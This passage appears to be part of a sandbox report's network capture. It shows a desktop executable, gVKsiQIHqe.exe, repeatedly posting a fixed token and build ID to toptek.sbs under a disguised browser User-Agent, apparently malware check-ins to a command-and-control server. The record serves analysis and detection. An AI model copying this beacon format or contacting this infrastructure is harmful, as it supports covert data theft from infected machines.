                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=2a7b1dd5dc2447f59a630ef65f8d1f37&HASH=2a7b&LV=202412&V=4&LU=1734933491152; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=4cbf64bd0a6742d89acfdf9810d4be1a; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2417
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:11 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49939 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:11 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47G
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:11 UTC | 1841 | OUT | Data Ascii:
------WT0R1DJWBSJM7YUKX47G
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------WT0R1DJWBSJM7YUKX47G
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------WT0R1DJWBSJM7YUKX47G
Cont
2024-12-23 05:58:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49948 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:14 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----16PP8GLX4OZU37YU3WL6
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:14 UTC | 1841 | OUT | Data Ascii:
------16PP8GLX4OZU37YU3WL6
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------16PP8GLX4OZU37YU3WL6
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------16PP8GLX4OZU37YU3WL6
Cont
2024-12-23 05:58:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49953 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:15 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----16PP8GLX4OZU37YU3WL6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:15 UTC | 1837 | OUT | Data Ascii: ------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------16PP8GLX4OZU37YU3WL6Cont
2024-12-23 05:58:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:16 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49962 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:17 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EK689ZM79H47YMGD2VA1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:17 UTC | 1837 | OUT | Data Ascii: ------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------EK689ZM79H47YMGD2VA1Cont
2024-12-23 05:58:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49967 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:18 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZCBASRIWTRIMY5PHVAI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:18 UTC | 1825 | OUT | Data Ascii: ------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------9ZCBASRIWTRIMY5PHVAICont
2024-12-23 05:58:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49974 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:20 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NYMYCB1VS0ZMYUSRQIW4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:20 UTC | 1825 | OUT | Data Ascii: ------NYMYCB1VS0ZMYUSRQIW4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------NYMYCB1VS0ZMYUSRQIW4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------NYMYCB1VS0ZMYUSRQIW4Cont
2024-12-23 05:58:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49976 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:21 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----RIWBA168GLNYM79RQ9ZC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:21 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------RIWBA168GLNYM79RQ9ZCContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------RIWBA168GLNYM79RQ9ZCContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------RIWBA168GLNYM79RQ9ZCCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:22 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49983 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:23 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NYMOHD2NOP8YMYU3ECBI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:23 UTC | 1825 | OUT | Data Ascii:
------NYMOHD2NOP8YMYU3ECBI
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------NYMOHD2NOP8YMYU3ECBI
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------NYMOHD2NOP8YMYU3ECBI
Cont
2024-12-23 05:58:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49990 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:24 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XLFCJEUKXLNYM7G4E3W4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:24 UTC | 1825 | OUT | Data Ascii:
------XLFCJEUKXLNYM7G4E3W4
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------XLFCJEUKXLNYM7G4E3W4
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------XLFCJEUKXLNYM7G4E3W4
Cont
2024-12-23 05:58:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49995 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:26 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:26 UTC | 1825 | OUT | Data Ascii:
------2DTJEUS2DTRQQIMOZMYM
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------2DTJEUS2DTRQQIMOZMYM
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------2DTJEUS2DTRQQIMOZMYM
Cont
2024-12-23 05:58:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49997 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:27 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ASR16FCT00ZMYMO8GV3O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:27 UTC | 1841 | OUT | Data Ascii:
------ASR16FCT00ZMYMO8GV3O
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------ASR16FCT00ZMYMO8GV3O
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------ASR16FCT00ZMYMO8GV3O
Cont
2024-12-23 05:58:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 50003 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:29 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6PHDT26XT2VAAAAAAAIM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:29 UTC | 1837 | OUT | Data Ascii: ------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PHDT26XT2VAAAAAAAIMCont
2024-12-23 05:58:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 50006 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:30 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6PHDT26XT2VAAAAAAAIM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:30 UTC | 1841 | OUT | Data Ascii: ------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PHDT26XT2VAAAAAAAIMContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PHDT26XT2VAAAAAAAIMCont
2024-12-23 05:58:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 50011 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:32 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:32 UTC | 1837 | OUT | Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------L6XBA1NYM7G47Q9000R1Cont
2024-12-23 05:58:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 50015 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:33 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:33 UTC | 1825 | OUT | Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------L6XBA1NYM7G47Q9000R1Cont
2024-12-23 05:58:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 50021 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:35 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:35 UTC | 1825 | OUT | Data Ascii: ------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------US0HLXBAAI5FU3WT000RCont
2024-12-23 05:58:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 50022 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:36 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----J5PP8Q9ZUA1NYMY5FCTR
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:36 UTC | 1837 | OUT | Data Ascii: ------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------J5PP8Q9ZUA1NYMY5FCTRCont
2024-12-23 05:58:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:37 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 50028 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:38 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:38 UTC | 1837 | OUT | Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Z5P8GDTJM7G4E3O8Q1DBCont
2024-12-23 05:58:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 50034 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:39 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:39 UTC | 1841 | OUT | Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Z5P8GDTJM7G4E3O8Q1DBCont
2024-12-23 05:58:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
